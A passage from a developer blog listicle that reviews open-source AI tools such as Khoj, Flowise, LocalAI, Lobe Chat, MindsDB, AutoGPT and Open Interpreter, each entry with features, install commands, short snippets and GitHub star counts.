notebook](https://vanna.ai/docs/app/) in case you want to see how it works after training. ![flask UI gif](https://vanna.ai/blog/img/vanna-flask.gif) Watch this [demo](https://github.com/vanna-ai/vanna?tab=readme-ov-file#vanna) for a complete walkthrough! ![vanna demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/40gg9oeb4piys15p2re2.gif) They have 9.5k+ stars on GitHub and are built using Python. {% cta https://github.com/vanna-ai/vanna %} Star Vanna ⭐️ {% endcta %} --- ## 2. [Khoj](https://github.com/khoj-ai/khoj) - Your AI second brain. ![khoj](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/31d9m3po4oppf4ignvbh.png) &nbsp; Khoj is the open source, AI copilot for search. Easily get answers without having to sift through online results or your own notes. For me, the concept seems exciting and It can help me in researching a lot of projects. Khoj can understand your Word, PDF, org-mode, markdown, plaintext files, GitHub projects, and even Notion pages. ![type of documents](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5ory8aio202w6ce5x6ul.png) It's available as a Desktop app, Emacs package, Obsidian plugin, Web app, and Whatsapp AI. Obsidian with Khoj might be the most powerful combo! You can get started with Khoj locally in a few minutes with the following commands. ``` $ pip install khoj-assistant $ khoj ``` Watch it in action! ![khoj walkthrough gif](https://media0.giphy.com/media/v1.Y2lkPTc5MGI3NjExN3RzNHA0MWE2NnB5aTMxOXlnY3puMDhkaHpwa2ZrYWlzMWJ0ZXRnNyZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/0VIZl3xIVyzzfS9hiJ/giphy.gif) Some of the exciting features: ✅ You can share your notes and documents to extend your digital brain. ✅ Your AI agents have access to the internet, allowing you to incorporate real-time information. ✅ You'll get a fast, accurate semantic search on top of your docs. ✅ Your agents can create deeply personal images and understand your speech. For instance, saying: "Create a picture of my dream house, based on my interests". It will draw this! ![image generation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s1f6gtwssn08mhk6s6ud.png) Read all the [features](https://docs.khoj.dev/category/features) including shareable chat, online chat, file summarization, and complete details in various categories. You can read the [docs](https://docs.khoj.dev/#/) and you can try [Khoj Cloud](https://app.khoj.dev/) to try it quickly. Watch the complete walkthrough on YouTube! {% embed https://www.youtube.com/watch?v=Lnx2K4TOnC4&pp=ygUYa2hvaiBvcGVuIHNvdXJjZSBwcm9qZWN0 %} It has 12k stars on GitHub and is backed by YCombinator. {% cta https://github.com/khoj-ai/khoj %} Star Khoj ⭐️ {% endcta %} --- ## 3. [Flowise](https://github.com/FlowiseAI/Flowise) - Drag & drop UI to build your customized LLM flow. ![flowiseai](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r5bp43nil764fhe4a05z.png) &nbsp; Flowise is an open source UI visual tool to build your customized LLM orchestration flow & AI agents. We shouldn't compare any projects but I can confidently say this might be the most useful one among the projects listed here! ![flowise gif](https://github.com/FlowiseAI/Flowise/raw/main/images/flowise.gif) Get started with the following npm command. ```npm npm install -g flowise npx flowise start OR npx flowise start --FLOWISE_USERNAME=user --FLOWISE_PASSWORD=1234 ``` This is how you integrate the API. ```javascript import requests url = "/api/v1/prediction/:id" def query(payload): response = requests.post( url, json = payload ) return response.json() output = query({ question: "hello!" )} ``` ![integrations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ahk2ovjrpq1qk3r5pfot.png) You can read the [docs](https://docs.flowiseai.com/). Cloud host is not available so you would have to self-host using these [instructions](https://github.com/FlowiseAI/Flowise?tab=readme-ov-file#-self-host). Let's explore some of the use cases: ⚡ Let's say you have a website (could be a store, an e-commerce site, or a blog), and you want to scrap all the relative links of that website and have LLM answer any question on your website. You can follow this [step-by-step tutorial](https://docs.flowiseai.com/use-cases/web-scrape-qna) on how to achieve the same. ![scraper](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e91sz2mga5wvc0x2hp2g.png) ⚡ You can also create a custom tool that will be able to call a webhook endpoint and pass in the necessary parameters into the webhook body. Follow this [guide](https://docs.flowiseai.com/use-cases/webhook-tool) which will be using Make.com to create the webhook workflow. ![webhook](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ckyivo9dvue461jc9pv4.png) There are a lot of other use cases such as building a SQL QnA or interacting with API. Explore and build cool stuff! FlowiseAI has 27.5k stars on GitHub and has more than 14k forks so it has a good overall ratio. {% cta https://github.com/FlowiseAI/Flowise %} Star Flowise ⭐️ {% endcta %} --- ## 4. [LLAMA GPT](https://github.com/getumbrel/llama-gpt) - a self-hosted, offline, ChatGPT like chatbot (Powered by Llama 2). ![llama gpt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/m5qoizptgncd0u1wlvqc.png) &nbsp; LlamaGPT is a self-hosted, offline, ChatGPT-like chatbot, powered by Llama 2. It's 100% private and your data doesn't leave your device. In the recent versions, they have also provided support for Code Llama models and Nvidia GPUs. You can install it from the [Umbrel App Store](https://apps.umbrel.com/app/llama-gpt) or you can also [install it with Kubernetes](https://github.com/getumbrel/llama-gpt?tab=readme-ov-file#install-llamagpt-with-kubernetes). You can read about the [supported models](https://github.com/getumbrel/llama-gpt?tab=readme-ov-file#supported-models) on the docs. It's very simple to use! ![llama gpt video](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8e0x0vkbt3jifov3vb3j.gif) I know, at this point it feels confusing that there are so many ways to run LLM locally. As a developer, I think it's important to evaluate which method works for our situation! They have 10k+ stars on GitHub and offer 2 packages. {% cta https://github.com/getumbrel/llama-gpt %} Star LLAMA GPT ⭐️ {% endcta %} --- ## 5. [LocalAI](https://github.com/mudler/LocalAI) - free OpenAI alternative. ![localAI](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ln76pv7ffcsq11c7wx45.png) &nbsp; LocalAI is free, open source, and considered as an alternative to OpenAI. LocalAI acts as a drop-in replacement REST API that’s compatible with OpenAI (Elevenlabs, Anthropic... ) API specifications for local AI inferencing. It allows you to run LLMs, generate images, and audio (and not only) locally or on-prem with consumer-grade hardware, supporting multiple model families. The best part is that it does not require GPU. I never thought that there would be such an option so it's a goldmine for devs who don't want to pay much. Plus, it allows to generate of Text, Audio, Video, and Images and also has voice cloning capabilities. What more do you need? You can watch the complete walkthrough by Semaphore CI! {% embed https://www.youtube.com/watch?v=Xh57mMlfuMk %} There are a lot of [integration options](https://localai.io/docs/integrations/) and developers have built awesome stuff such as [Extension for attaching LocalAI instance to VSCode](https://github.com/badgooooor/localai-vscode-plugin). You can read the [quickstart guide](https://localai.io/basics/getting_started/) and how to [run it with kubernetes](https://localai.io/basics/kubernetes/). Find all the [resources](https://github.com/mudler/LocalAI?tab=readme-ov-file#book--media-blogs-social) including how to run it on AWS, k8sgpt, and more. They have 21k+ stars on GitHub and are on the `v2.18` release. {% cta https://github.com/mudler/LocalAI %} Star LocalAI ⭐️ {% endcta %} --- ## 6. [Continue](https://github.com/continuedev/continue) - enable you to create an AI software development system. ![continue](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7ro5ctus5tdfvqdnysby.png) &nbsp; Continue is one of the best AI code assistants I've seen in my developer journey. You can connect any models and any context to build custom autocomplete and chat experiences inside [VS Code](https://marketplace.visualstudio.com/items?itemName=Continue.continue) and [JetBrains](https://plugins.jetbrains.com/plugin/22707-continue-extension). You can easily set it up. Below are some of the snapshots while I was installing it. ![step 1](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/rq5ld2djixiv5pmz8zzx.png) <figcaption>Step 1</figcaption> &nbsp; ![step 2](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j9u0lan7koa5sjtysykw.png) <figcaption>run it through terminal</figcaption> &nbsp; ![step2 complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/duhhgmg2eqr1tk1r2ecy.png) <figcaption>step2 complete</figcaption> &nbsp; ![step3](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wzufhvtre8o97wq3zqlr.png) <figcaption>run it through terminal</figcaption> &nbsp; ![step3 complete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nd4lu8r0shiah1v7odq0.png) <figcaption>step3 complete</figcaption> &nbsp; After you've configured it, you're all set to use all the amazing concepts it provides. They have a lot of awesome features such as: > Tab to autocomplete code suggestions. ![autocomplete](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/09xt6urla4jic5x3m5rr.gif) > Ask questions about your codebase. ![questions](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qd95frn0j9cd417yighz.gif) > Understand terminal errors immediately. ![errors](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kaaq6x5978tm1u61moxb.gif) > Kick off actions with slash commands. ![commands](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j4vlzc2vuiuoivgqy5e7.png) > Refactor functions where you are coding. ![refactor](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7wz1tzon8afivi79ulvn.png) Read about all the [features](https://docs.continue.dev/how-to-use-continue). You will have to install the [VSCode extension](https://marketplace.visualstudio.com/items?itemName=Continue.continue) from the marketplace and then read the [quickstart guide](https://docs.continue.dev/quickstart). You can read the [docs](https://docs.continue.dev/intro). You can also watch this basic demo on YouTube! {% embed https://www.youtube.com/watch?v=V3Yq6w9QaxI&t=29s&pp=ygUaY29udGludWUgYWkgY29kZSBhc3Npc3RhbnQ%3D %} They have 13k+ stars on GitHub and are built using TypeScript. {% cta https://github.com/continuedev/continue %} Star Continue ⭐️ {% endcta %} --- ## 7. [Chat2DB](https://github.com/chat2db/Chat2DB) - AI-driven data management platform. ![chat2db](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/0fu2hozmkm3ps8l99rj9.png) &nbsp; Chat2DB is an AI-first data management, development, and analysis tool. Its core is AIGC (Artificial Intelligence Generation Code), which can convert natural language into SQL, SQL into natural language, and automatically generate reports, taking efficiency to another level. Even operations that do not understand SQL can use it to quickly query business data and generate reports. When you do any operation, it will give you some suggestions. For instance, when you are doing database development, it will help you generate SQL directly in natural language, give you SQL optimization suggestions, help you analyze SQL performance, analyze SQL execution plan, and can also help you quickly generate SQL test data, system code, etc. It's actually very powerful :) They have excellent support for multi-data sources and can easily integrate up to 17 different database types including PostgreSQL, MySQL, MongoDB, and Redis. ![databases](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c5k3ryojynrovdlx508i.png) You can download or [try it in the browser](https://app.chat2db.ai/). Let's see some of the exciting features: ✅ Intelligent reports. ![reports](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/g4580tabu3t3vq48e0k5.png) ✅ Data Exploration. ![data exploration](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mqq58sgw239ugep7ocez.png) ✅ SQL Development. ![SQL Development](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7fpvwv5lpiyqil2t6aig.png) &nbsp; ![sql development](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/j6zszr0onru157uuvhpw.png) You can read the [quickstart guide](https://docs.chat2db.ai/docs/start-guide/getting-started) on the official docs. They have 14k+ stars on GitHub and are on the release `v3.2`. {% cta https://github.com/chat2db/Chat2DB %} Star Chat2DB ⭐️ {% endcta %} --- ## 8. [LibreChat](https://github.com/danny-avila/LibreChat?tab=readme-ov-file) - Enhanced ChatGPT Clone. ![libre chat](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/khdouc1ssvs8g3wwfets.png) &nbsp; LibreChat is a free, open source AI chat platform. This Web UI offers vast customization, supporting numerous AI providers, services, and integrations. It serves all AI conversations in one place with a familiar interface, and innovative additions, for as many users as you need. Some of the features are: ✅ Upload and analyze images seamlessly with advanced models like Claude 3, GPT-4, Gemini Vision, Llava, and Assistants. ✅ Chat with files using various powerful endpoints using OpenAI, Azure, Anthropic, and Google. ✅ Multilingual UI with support for 20+ languages. ✅ [Diverse Model options](https://www.librechat.ai/docs/features#diverse-model-options) including OpenAI, BingAI, Anthropic (Claude), Azure OpenAI, and Google’s premier machine learning offerings. ![ai model image](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3lwh3xae7ax2yejsqwxp.png) You can read the [quickstart guide](https://www.librechat.ai/docs/quick_start) to get started. Watch this video for the complete walkthrough! {% embed https://www.youtube.com/watch?v=bSVHEbVPNl4 %} They have 15k+ stars on GitHub and offer 4 packages. {% cta https://github.com/danny-avila/LibreChat?tab=readme-ov-file %} Star LibreChat ⭐️ {% endcta %} --- ## 9. [Lobe Chat](https://github.com/lobehub/lobe-chat) - modern-design LLMs/AI chat framework. ![lobe chat](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ddxibf7xxx931tdoj1mn.png) &nbsp; An open-source, modern-design ChatGPT/LLMs UI/Framework. Supports speech-synthesis, multi-modal, and extensible (function call) plugin systems. You can deploy your private OpenAI with one click. ![journey](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/39se198xal53r854sdps.png) Let's see some of the exciting features of LobeChat: ✅ Multi-Model Service Provider Support. ![multi service](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nodazgxel962wrp2hnvo.png) They have expanded our support to multiple model service providers, rather than being limited to a single one. Find the complete list of [10+ model service providers](https://lobehub.com/docs/usage/features/multi-ai-providers) that they support. ✅ Assistant Market. ![Assistant Market](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/35z3kz2jr4mnxid9dwsg.png) In LobeChat's [Assistant Market](https://lobehub.com/assistants), creators can discover an innovative community that brings together numerous carefully designed assistants. ![market](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ex23f2epblfp2cxtxbnl.png) There are so many awesome applications there. WOW! ✅ Model Vision Recognition. ![Model Vision Recognition](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/fuxz350091223cj36dq7.png) LobeChat now supports large language models with visual recognition capabilities such as OpenAI's gpt-4-vision, Google Gemini Pro vision, and Zhipu GLM-4 Vision, enabling LobeChat to have multimodal interaction capabilities. Users can easily upload or drag and drop images into the chat box, and the assistant will be able to recognize the content of the images and engage in intelligent conversations. ✅ Text to Image Generation. ![Text to Image Generation](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/z2q6qzcy8anjgsg2381o.png) You can directly utilize the Text-to-image tool during conversations with the assistant. By using the power of AI tools such as DALL-E 3, MidJourney, and Pollinations, assistants can now implement it properly. ✅ Local Large Language Model (LLM) Support. ![Local Large Language Model (LLM) Support.](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ucn4rpa4p2vb11hhvkn1.png) With the powerful infrastructure of Ollama AI and the community's collaborative efforts, you can now engage in conversations with a local LLM (Large Language Model) in LobeChat! By running the following Docker command, you can experience conversations with a local LLM in LobeChat. ```bash docker run -d -p 3210:3210 -e OLLAMA_PROXY_URL=http://host.docker.internal:11434/v1 lobehub/lobe-chat ``` ✅ Progressive Web App (PWA). ![Progressive Web App (PWA)](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sccmha74iz01rr12gphr.png) They have adopted Progressive Web App PWA technology, which is a modern web technology that elevates web applications to a near-native app experience. ✅ Custom Themes. ![custom themes](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/7cl73pplbor4z1381kdm.png) &nbsp; Read about all of the [features and use cases](https://lobehub.com/docs/usage/start). You can self-host or deploy it using docker. The [ecosystem](https://github.com/lobehub/lobe-chat/tree/main?tab=readme-ov-file#-ecosystem) of lobe chat provides 4 packages: `lobehub/ui`, `lobehub/icons`, `lobehub/tts`, and `lobehub/lint`. They also provide [plugins market](https://lobehub.com/plugins) where you can find lots of useful plugins that can be used to introduce new function calls and even new ways to render message results. If you want to develop your own plugin, refer to [📘 Plugin Development Guide](https://lobehub.com/docs/usage/plugins/development) in the wiki. ![plugins market](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uqtxt31vc42uwnw2ukgr.png) You can read the [docs](https://lobehub.com/docs/usage/start). You can check the [live demo](https://chat-preview.lobehub.com/chat). It's pretty cool! ![demo snapshot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xe3ngshtwpps2kmpu98f.png) They have 35k+ stars on GitHub with more than 500 releases. {% cta https://github.com/lobehub/lobe-chat %} Star Lobe Chat ⭐️ {% endcta %} --- ## 10. [MindsDB](https://github.com/mindsdb/mindsdb) - The platform for customizing AI from enterprise data. ![MindsDB](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/i9q3jdswxdx6wqfk0vqw.png) &nbsp; MindsDB is the platform for customizing AI from enterprise data. With MindsDB, you can deploy, serve, and fine-tune models in real-time, utilizing data from databases, vector stores, or applications, to build AI-powered apps - using universal tools developers already know. ![mindsdb](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d7ggww5ner38r4r9qc06.png) With MindsDB and its nearly [200 integrations](https://docs.mindsdb.com/integrations/data-overview) to data sources and AI/ML frameworks, any developer can use their enterprise data to customize AI for their purpose, faster and more securely. ![how MindsDB works](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4q1gfmhq43gopdix03gr.png) You can read the [docs](https://docs.mindsdb.com/) and [quickstart guide](https://docs.mindsdb.com/quickstart-tutorial) to get started. They currently support a total of [3 SDKs](https://docs.mindsdb.com/sdks/overview) that is using using Mongo-QL, Python, and JavaScript. There are several applications of MindsDB such as integrating with numerous data sources and AI frameworks so you can easily bring data and AI together to create & automate custom workflows. The other common use cases include fine-tuning models, chatbots, alert systems, content generation, natural language processing, classification, regressions, and forecasting. Read more about the [use cases](https://docs.mindsdb.com/use-cases/) and each of them has an architecture diagram with a little info. ![use cases](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wuhxzbioqh9a5s9f0w7s.png) For instance, the chatbot architecture diagram with MindsDB. You can read about all the [solutions](https://github.com/mindsdb/mindsdb?tab=readme-ov-file#-get-started) provided along with their SQL Query examples. ``` // SQL Query Example for Chatbot CREATE CHATBOT slack_bot USING database='slack',agent='customer_support'; ``` ![chatbot](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/otoqsro02ghqb709yglk.png) Just to tell you about the overall possibilities, you can check out [How to Forecast Air Temperatures with AI + IoT Sensor Data](https://mindsdb.com/blog/how-to-forecast-air-temperatures-with-ai-iot-sensor-data). Exciting right :) ![mindsdb](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/82wrjyrkch44taeurv1r.png) They have 25.4k+ stars on GitHub and are on the `v24.7.2.0` with more than 200 releases. By the way, this is the first time I've seen 4 parts in any release as I always followed the semantic release. {% cta https://github.com/mindsdb/mindsdb %} Star MindsDB ⭐️ {% endcta %} --- ## 11. [AutoGPT](https://github.com/Significant-Gravitas/AutoGPT) - more exciting than ChatGPT. ![auto gpt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/3hjamyxzkhy7luwsi9vp.png) &nbsp; At the core of AutoGPT lies its primary project, a semi-autonomous agent driven by large language models (LLMs), designed to perform any tasks for you. The AutoGPT project consists of [four main components](https://docs.agpt.co/#agent): - The Agent – also known as just "AutoGPT" - The Benchmark – AKA agbenchmark - The Forge - The Frontend Read on how you can [set up AutoGPT](https://docs.agpt.co/autogpt/setup/) using the OpenAI key. You can see this [YouTube video by Fireship](https://www.youtube.com/watch?v=_rGXIXyNqpk) on what is AutoGPT. {% embed https://www.youtube.com/watch?v=_rGXIXyNqpk %} You can also watch this [AutoGPT tutorial](https://www.youtube.com/watch?v=FeIIaJUN-4A) by Sentral Media. You can read the [docs](https://docs.agpt.co/) and check out the [project board](https://github.com/orgs/Significant-Gravitas/projects/1) on what things are under development right now. Even if you don't know much about AI, you can try AutoGPT to understand how you can save time and build cool stuff. They have 164k+ stars on GitHub due to such an excellent use case and automation capabilities. {% cta https://github.com/Significant-Gravitas/AutoGPT %} Star AutoGPT ⭐️ {% endcta %} --- ## 12. [reor](https://github.com/reorproject/reor) - self organizing AI note-taking app. ![reor](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/c0x2q2a67bg7gzdekizw.png) &nbsp; One of the most exciting projects that I've seen so far, especially because it runs models locally. Reor is an AI-powered desktop note-taking app. It automatically links related notes, answers questions on your notes, and provides semantic search. Everything is stored locally and you can edit your notes with an Obsidian-like markdown editor. The project hypothesizes that AI tools for thought should run models locally by default. Reor stands on the shoulders of the giants `Ollama`, `Transformers.js` & `LanceDB` to enable both LLMs and embedding models to run locally. Connecting to OpenAI or OpenAI-compatible APIs like Oobabooga is also supported. > I know you're wondering How can it possibly be `self-organizing`? a. Every note you write is chunked and embedded into an internal vector database. b. Related notes are connected automatically via vector similarity. c. LLM-powered Q&A does RAG on the corpus of notes. d. Everything can be searched semantically. You can watch the demo here! ![demo](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k1whpg9m7ubt5xluyf7f.gif) One way to think about Reor is as a RAG app with two generators: the LLM and the human. In Q&A mode, the LLM is fed retrieved context from the corpus to help answer a query. Similarly, in editor mode, we can toggle the sidebar to reveal related notes `retrieved` from the corpus. This is quite a powerful way of `augmenting` your thoughts by cross-referencing ideas in a current note against related ideas from your digital collection. You can read the [docs](https://www.reorproject.org/docs) and [download](https://www.reorproject.org/) from the website. Mac, Linux & Windows are all supported. They have also provided starter guides to help you get started. ![get started guides](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/bx3w7nalcwc9egumu0hm.png) You can also watch this walkthrough! {% embed https://www.youtube.com/watch?v=2XFYyrQz9xQ&pp=ygUYcmVvciBvcGVuIHNvdXJjZSBwcm9qZWN0 %} They have 6.5k stars on GitHub and are built using TypeScript. {% cta https://github.com/reorproject/reor %} Star reor ⭐️ {% endcta %} --- ## 13. [Leon](https://github.com/leon-ai/leon) - your open source personal assistant. ![leon](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/mnv85osce6ps9xodf07t.png) &nbsp; Leon is an open source personal assistant who can live on your server. You're definitely curious, right? 😅 He does stuff when you ask him to. You can even talk to him and he will revert by talking to you. Similarly, you can also text him! If you are a developer (or not), you may want to build many things that could help in your daily life. Instead of building a dedicated project for each of those ideas, Leon can help you with his `Skills` structure. ![leon gif](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ygd52jmxnyz5ctjfoyto.gif) If you want to, Leon can communicate with you by being offline to protect your privacy. This is a list of [skills](https://github.com/leon-ai/leon/tree/develop/skills) that Leon can do for now. You should read the [story behind Leon](https://blog.getleon.ai/the-story-behind-leon/). You can also watch this demo to learn more about Leon. {% embed https://www.youtube.com/watch?v=p7GRGiicO1c %} ![features](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/70mddmgadcbfwzugd1bl.png) This is the High-level architecture schema of Leon. ![architecture](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/a6b9vgj3fagera0bsyur.png) You can install Leon by using this command. ``` # install leon global cli npm install --global @leon-ai/cli # install leon leon create birth ``` You can read the [docs](https://docs.getleon.ai/). Appwrite is one of the sponsors which says a lot about its overall impact. It has 15k stars on GitHub and has released some drastic changes recently so make sure to read the docs with extra caution. {% cta https://github.com/leon-ai/leon %} Star Leon ⭐️ {% endcta %} --- ## 14. [Instrukt](https://github.com/blob42/Instrukt) - Integrated AI in the terminal. ![instrukt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wsk64pf5yuosui91tmz9.png) &nbsp; Instrukt is a terminal-based AI-integrated environment. It offers a platform where users can: - Create and instruct modular AI agents. - Generate document indexes for question-answering. - Create and attach tools to any agent. Instruct them in natural language and, for safety, run them inside secure containers (currently implemented with Docker) to perform tasks in their dedicated, sandboxed space. It's built using `Langchain`, `Textual`, and `Chroma`. Get started with the following command. ``` pip install instrukt[all] ``` ![instrukt](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/r3aza7hnlji7hbi2o0js.gif) There are a lot of exciting features such as: ✅ A terminal-based interface for power keyboard users to instruct AI agents without ever leaving the keyboard. ✅ Index your data and let agents retrieve it for question-answering. You can create and organize your indexes with an easy UI. ✅ Index creation will auto-detect programming languages and optimize the splitting/chunking strategy accordingly. ✅ Run agents inside secure docker containers for safety and privacy. ✅ Integrated REPL-Prompt for quick interaction with agents, and a fast feedback loop for development and testing. ✅ You can automate repetitive tasks with custom commands. It also has a built-in prompt/chat history. You can read about all the [features](https://github.com/blob42/Instrukt?tab=readme-ov-file#features). You can read the [installation guide](https://blob42.github.io/Instrukt/install.html). You can also debug and introspect agents using an in-built IPython console which is a neat little feature. ![console debugging](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/qaan8np68e3fk1yueexm.png) Instrukt is licensed with an AGPL license meaning that it can be used by anyone for whatever purpose. It is safe to say that Instrukt is an AI commander for your terminal. It is a new project so they have around 240 stars on GitHub but the use case is damn good. {% cta https://github.com/blob42/Instrukt %} Star Instrukt ⭐️ {% endcta %} --- ## 15. [Quivr](https://github.com/QuivrHQ/quivr) - RAG Framework for building GenAI Second Brains. ![quivr](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oiowtt3ys9shf4iivglq.png) &nbsp; Quivr, your second brain, utilizes the power of GenerativeAI to be your personal assistant! You can think of it as Obsidian but turbocharged with AI powers. Quivr is a platform that enables the creation of AI assistants, referred to as `Brain`. These assistants are designed with specialized capabilities like some can connect to specific data sources, allowing users to interact directly with the data. While others serve as specialized tools for particular use cases, powered by Rag technology. These tools process specific inputs to generate practical outputs, such as summaries, translations, and more. Watch a quick demo of Quivr! ![quivr gif](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k7xx3290daebg2pw11i2.gif) Some of the amazing features are: ✅ You can choose the type of Brain you want to use, based on the data source you wish to interact with. ✅ They also provide a powerful feature to share your brain with others. This can be done by sharing with individuals via their emails and assigning them specific rights. ![sharing brain](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/e3mn636j0sl6si5lzpzf.png) ✅ Quivr works offline, so you can access your data anytime, anywhere. ✅ You can access and continue your past conversations with your brains. ✅ But the best one that I loved is that you can literally install a Slack bot. Refer to this demo to see what you can do. Very cool! {% embed https://youtu.be/1yMe21vIl9E %} Anyway, read about all the [awesome stuff](https://docs.quivr.app/features/brain-creation) that you can do with Quivr. You can read the [installation guide](https://github.com/QuivrHQ/quivr?tab=readme-ov-file#getting-started-) and [60 seconds installation video](https://www.youtube.com/watch?v=cXBa6dZJN48). I really loved this idea! You can read the [docs](https://docs.quivr.app/home/intro). ![stats](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5a27c2ubbmri0b2xlh1l.png) They have also provided [guides](https://docs.quivr.app/deployment/porter) on how to deploy Quivr with Vercel, Porter, AWS, and Digital Ocean. They could provide a better free tier plan but it's more than enough to test things on your end. It has 30k+ Stars on GitHub with 220+ releases which means they're constantly improving. {% cta https://github.com/QuivrHQ/quivr %} Star Quivr ⭐️ {% endcta %} --- ## 16. [Open Interpreter](https://github.com/OpenInterpreter/open-interpreter) - natural language interface for terminal. ![Open Interpreter](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/av7udc5fibj1wz88w0u8.png) &nbsp; Open Interpreter lets LLMs run code (Python, Javascript, Shell, and more) locally. You can chat with Open Interpreter through a ChatGPT-like interface in your terminal by running `$ interpreter` after installing. This provides a natural-language interface to your computer's general-purpose capabilities: ✅ Create and edit photos, videos, PDFs, etc. ✅ Control a Chrome browser to perform research Plot, clean, and analyze large datasets. I don't know about you, but their [website](https://www.openinterpreter.com/) made me say WOW! Quickstart using this command. ```python pip install open-interpreter // After installation, simply run: interpreter ``` You can read the [quickstart guide](https://docs.openinterpreter.com/getting-started/introduction). You should read about the [comparison to ChatGPT's Code Interpreter](https://github.com/OpenInterpreter/open-interpreter?tab=readme-ov-file#comparison-to-chatgpts-code-interpreter) and the [commands](https://github.com/OpenInterpreter/open-interpreter?tab=readme-ov-file#commands) that you can use. You can read the [docs](https://docs.openinterpreter.com/getting-started/introduction). Open Interpreter works with both hosted and local language models. Hosted models are faster and more capable, but require payment while local models are private and free but are often less capable. Choose based on your use case! They have 48k+ stars on GitHub and are used by 300+ developers. {% cta https://github.com/OpenInterpreter/open-interpreter %} Star Open Interpreter ⭐️ {% endcta %} --- ## 17. [CopilotKit](https://github.com/CopilotKit/CopilotKit) - 10x easier to build AI Copilots. ![copilotKit](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/iq3tyn2vi21qmnso1lg7.png) &nbsp; You will agree that it's tough to add AI features in React, that's where Copilot helps you as a framework for building custom AI Copilots. You can build in-app AI chatbots, and in-app AI Agents with simple components provided by Copilotkit which is at least 10x easier compared to building it from scratch. You shouldn't reinvent the wheel if there is already a very simple and fast solution! They also provide built-in (fully-customizable) Copilot-native UX components like `<CopilotKit />`, `<CopilotPopup />`, `<CopilotSidebar />`, `<CopilotTextarea />`. ![components](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/abbaw6u488uu6xw8y88x.png) Get started with the following npm command. ```npm npm i @copilotkit/react-core @copilotkit/react-ui ``` This is how you can integrate a Chatbot. A `CopilotKit` must wrap all components which interact with CopilotKit. It’s recommended you also get started with `CopilotSidebar` (you can swap to a different UI provider later). ```javascript "use client"; import { CopilotKit } from "@copilotkit/react-core"; import { CopilotSidebar } from "@copilotkit/react-ui"; import "@copilotkit/react-ui/styles.css"; export default function RootLayout({children}) { return ( <CopilotKit url="/path_to_copilotkit_endpoint/see_below"> <CopilotSidebar> {children} </CopilotSidebar> </CopilotKit> ); } ``` You can read the [docs](https://docs.copilotkit.ai/getting-started/quickstart-textarea) and check the [demo video](https://github.com/CopilotKit/CopilotKit?tab=readme-ov-file#demo). You can integrate Vercel AI SDK, OpenAI APIs, Langchain, and other LLM providers with ease. You can follow this [guide](https://docs.copilotkit.ai/getting-started/quickstart-chatbot) to integrate a chatbot into your application. The basic idea is to build AI Chatbots very fast without a lot of struggle, especially with LLM-based apps. You can watch the complete walkthrough! {% embed https://youtu.be/VFXdSQxTTww %} CopilotKit has recently crossed 7k+ stars on GitHub with 300+ releases. {% cta https://github.com/CopilotKit/CopilotKit %} Star CopilotKit ⭐️ {% endcta %} --- ## 18. [GPT Engineer](https://github.com/gpt-engineer-org/gpt-engineer) - AI builds what you ask. ![gpt 